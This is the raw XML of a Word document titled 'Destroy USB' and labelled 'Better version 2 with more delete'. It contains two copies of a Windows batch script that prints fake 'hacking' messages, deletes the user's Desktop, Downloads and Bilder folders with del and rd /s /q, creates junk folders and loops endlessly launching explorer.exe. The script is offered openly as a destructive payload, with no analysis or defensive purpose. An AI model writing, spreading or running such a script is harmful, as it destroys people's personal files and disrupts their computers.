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C9D7" w14:textId="49143996" w:rsidR="00305D87" w:rsidRPr="00F95D28" w:rsidRDefault="00305D87" w:rsidP="00305D87">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F95D28">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Destroy USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C52D8" w14:textId="20BAFE30" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Better version 2 with more delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E70F7BB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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDC8E1C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title hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44A575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color 0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C58D0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 xml:space="preserve">echo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>im</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3537FF33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timeout /t 3 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="404626FC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timeout /t 3 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E527B1F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timeout /t 2 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D4A2B7B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 xml:space="preserve">echo Hacking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>statet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4172D1A5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timeout /t 3 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CE1771D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echo delete folder and system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A37B03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timeout /t 3 &gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AB2F616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echo kill Pc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E977537" w14:textId="77777777" w:rsidR="00017140" w:rsidRPr="00017140" w:rsidRDefault="00017140" w:rsidP="00017140">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>del "%USERPROFILE%\Desktop\*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1378CD46" w14:textId="77777777" w:rsidR="00017140" w:rsidRPr="00017140" w:rsidRDefault="00017140" w:rsidP="00017140">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>rd /s /q "%USERPROFILE%\Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67A783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rd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /s /q "%USERPROFILE%\Downloads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91FF17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rd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /s /q "%USERPROFILE%\Bilder"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C7BC0" w14:textId="7904ABF3" w:rsidR="00017140" w:rsidRDefault="00017140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 w:rsidR="00855FB1"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 w:rsidR="00855FB1"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 w:rsidR="00855FB1"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1F2A7011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3A19F69F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1116FF51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3A4D79D4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494784B8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57BB645A" w14:textId="77777777" w:rsidR="00855FB1" w:rsidRPr="00017140" w:rsidRDefault="00855FB1" w:rsidP="00855FB1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3D31161F" w14:textId="375FEDEB" w:rsidR="00855FB1" w:rsidRPr="00017140" w:rsidRDefault="00855FB1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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> im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in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your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC412CC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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:loop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4911EFBB" w14:textId="63FCA060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t>shut</w:t>
      </w:r>
      <w:r w:rsidR="00855FB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>own /a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5026B326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r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>start explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B386F4" w14:textId="77777777" w:rsidR="00017140" w:rsidRPr="00017140" w:rsidRDefault="00017140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goto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E19415" w14:textId="3D4D29CA" w:rsidR="00F95D28" w:rsidRPr="00017140" w:rsidRDefault="00017140" w:rsidP="00017140">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF1D8A" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2531177D" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F64A23C" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E035E41" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776C8EFD" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64751732" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717F1E21" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1893FB" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FDF75E" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C40039" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1B5892" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01AA60FE" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBB9CB5" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E5A9BCF" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F9FFE5" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA956E7" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B8E55A" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412F55E7" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0E9DE8" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4699C278" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37896207" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="224B0664" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3E6352" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55A9484A" w14:textId="77777777" w:rsidR="00F95D28" w:rsidRDefault="00F95D28" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4341DF22" w14:textId="26A2FBF9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@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5119E11C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title hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DDCD21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lastRenderedPageBreak/>
        <w:t>color 0A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201362A7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echo im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC5738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timeout /t 3 &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6ABBD0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timeout /t 3 &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB3E471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timeout /t 2 &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434FA0A3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echo Hacking statet....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D26208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timeout /t 3 &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0207BE6D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echo delete folder and system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E211630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timeout /t 3 &gt;nul</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D314A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echo kill Pc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038CC68" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>del "%USERPROFILE%\Desktop\*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E069A88" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>rd /s /q "%USERPROFILE%\Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E632AB2" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>rd /s /q "%USERPROFILE%\Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D69DFF5" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>rd /s /q "%USERPROFILE%\Bilder"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C1860E" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2840AEF0" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5483FDBC" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:r>
        <w:t>mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A9F940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mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CBF1EE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mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280CFD98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mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15698AA9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mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF93217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mkdir im in your data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0354C7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:loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD82784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start explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870C8E5" w14:textId="77777777" w:rsidR="00DA118E" w:rsidRPr="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA118E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>goto loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098E0860" w14:textId="19D7E025" w:rsidR="00305D87" w:rsidRPr="00DA118E" w:rsidRDefault="00DA118E" w:rsidP="00DA118E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA118E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd /k</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3E93A" w14:textId="77777777" w:rsidR="00305D87" w:rsidRPr="00DA118E" w:rsidRDefault="00305D87">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00305D87" w:rsidRPr="00DA1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87"/>
    <w:rsid w:val="00017140"/>
    <w:rsid w:val="002D7FFA"/>
    <w:rsid w:val="00305D87"/>
    <w:rsid w:val="00630367"/>
    <w:rsid w:val="00855FB1"/>
    <w:rsid w:val="00974679"/>
    <w:rsid w:val="009B7B1D"/>
    <w:rsid w:val="00C56C3D"/>
    <w:rsid w:val="00CF4A24"/>
    <w:rsid w:val="00D76054"/>
    <w:rsid w:val="00DA118E"/>
    <w:rsid w:val="00F62671"/>
    <w:rsid w:val="00F95D28"/>
    <w:rsid w:val="00F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AD5AC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9F2048A1-54AD-4AD8-89A0-6F059CE0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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-28T13:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-28T13:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>